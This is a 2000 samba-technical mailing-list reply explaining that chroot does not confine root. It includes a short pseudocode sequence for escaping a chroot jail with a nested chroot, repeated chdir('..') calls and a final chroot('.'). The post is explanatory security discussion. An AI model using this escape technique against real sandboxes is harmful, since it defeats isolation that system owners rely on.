BUG: Wide Links - does not work as documented
Peter Samuelson
peter at cadcamlab.org
Fri Apr 21 23:32:33 GMT 2000
[Mayers, P J]
> I was under the impression chroot'ing back out was impossible.
Not for root. It's a common misconception. chroot() does buy you
*some* security, mostly by making it harder to crack root (you can take
out all device files and setuid executables). Once you've cracked
root, it's easy to get out:
# Earlier...
chdir("/some/chroot/testdir")
chroot("/some/chroot/testdir")
# Now we're in a chroot jail. Time to break out.
mkdir("xxx")
chroot("xxx")
# Look, we made a new chroot jail. And we're outside it.
# Which means chdir("..") will *not* get trapped....
chdir("../../../../../../../../../..")
chdir("../../../../../../../../../..")
chdir("../../../../../../../../../..")
# Assume we've hit the root directory by now.
chroot(".")
Peter
More information about the samba-technical
mailing list